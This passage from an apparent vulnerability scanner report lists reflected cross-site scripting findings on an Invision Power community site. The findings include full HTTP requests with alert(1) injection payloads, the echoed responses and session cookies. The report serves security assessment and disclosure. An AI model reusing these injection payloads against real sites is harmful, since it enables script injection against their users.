This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=574c304259c12fb245c396fa11aa3e0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:27 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:30 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjG3rgVcMFxc3gau; expires=Thu, 02-Feb-2012 23:12:30 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1&amp;_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=483934fd9ed109c9f59012f046077e03; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:50 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjO1rgVcMFxc4Aau; expires=Thu, 02-Feb-2012 23:12:50 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1e8a6cf95c755b71a85b23d27acc781f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:44 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwsTC1rgVcMFxc7Qax; expires=Thu, 02-Feb-2012 23:14:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=828e007355de3a267f8189ac08ed6f71; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwMTO2rgVcMFxc3wat; expires=Thu, 02-Feb-2012 23:14:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:08:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8a369b3a7a3462aa407cc49d4fe33267; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:08:08 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:08:10 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:08:12 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrXOtDI0sjQzs7AwsDSwrgVcMFxcNwag; expires=Thu, 02-Feb-2012 23:08:12 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1";
       ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3936-ipdownloads-file-version-in-support-topic-title/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ac46a5f91ebbe68b20c4bad9616a198e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:54 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:55 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:56 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrPOtDI0sjQzs7AwMDS1rgVcMFxcNgae; expires=Thu, 02-Feb-2012 23:06:56 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1";
       ipb.sharelinks.title = "IP.Downloads file version in support topic title";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3937-peace/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=87bfd7d61ac44499caa74b4611ca9ede; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:17 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:18 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:20 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrfOtDI0sjQzs7AwMLawrgVcMFxcVwak; expires=Thu, 02-Feb-2012 23:07:20 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1";
       ipb.sharelinks.title = "Peace";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=21b812349bc4e0a64fc1a88e53d7af77; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:43 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trDOtDI0sjQzs7AwMDC1rgVcMFxcUgaf; expires=Thu, 02-Feb-2012 23:06:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1";
       ipb.sharelinks.title = "Turkish / Türkçe Language Pack for (M31) Videos System 2.0.3 (public side)";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3939-vietnamese-3xx-lang/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=fe0291a4b1037d3d3b5c18ad01340692; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:02 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:04 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trTOtDI0sjQzs7AwMDK2rgVcMFxcZAag; expires=Thu, 02-Feb-2012 23:07:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1";
       ipb.sharelinks.title = "Vietnamese 3.x.x lang";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3940-dp31-ihost/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=646b6b288c61575cd993419c6b0d1b8a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbDOtDI0sjQzs7AwMDS3rgVcMFvtBps%2C; expires=Thu, 02-Feb-2012 23:06:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1";
       ipb.sharelinks.title = "(DP31) iHost";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3941-vanilla-valentine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
